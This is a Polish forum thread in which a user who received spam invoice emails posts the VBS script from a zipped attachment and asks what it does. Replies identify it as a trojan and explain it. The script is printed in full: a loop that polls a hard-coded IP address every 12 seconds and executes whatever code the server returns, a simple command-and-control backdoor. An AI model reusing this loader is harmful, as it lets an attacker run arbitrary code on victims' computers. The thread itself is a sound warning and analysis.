Wątek przeniesiony 2021-01-28 13:33 z Inne języki programowania przez cerrato.

VBS - spam

0

Cześć,
ostatnio dostaje dziwne maile faktury/zmówienie itd. W załączniku skrypt vbs w zipie. Po edycji takie coś:
dim pcoblect, urls, date
Function FaxPc()
On Error Resume Next
While true
date = FormatDateTime(Now, vbLongTime)
urls = "http://107.174.81.200/z/" + date
WScript.Sleep 12000
Set pcoblect = createobject("Microsoft.XMLHTTP")
pcoblect.Open "GET", urls, False
pcoblect.Send
TextFax(pcoblect.responseText)
Wend
End Function
FaxPc()

Function TextFax(text)
On Error Resume Next
Execute "" + text + ""
End Function

' edWrQZvJkg

Czy możecie powiedzieć co to robi?

0

To jest Wirus lepiej go nie uruchamiaj
Nazwa: VBS:Agent-BTC [Trojan]

0

To jest Wirus lepiej go nie uruchamiaj

0

@senk2005
Tekst zmiennej "url" w powyższym przykładzie został przekształcony w hiperłącze.
Zmień go proszę, aby ktoś przypadkiem go nie otworzył. Nie wiesz jakie działania podejmuje serwer po drugiej stronie.

Jeśli chodzi o działanie skryptu, to co 12 sekund odpytuje adres ze zmiennej urls i próbuje uruchomić otrzymane w odpowiedzi polecenie. Prosta metoda Command & Control.

Paweł

1 użytkowników online, w tym zalogowanych: 0, gości: 1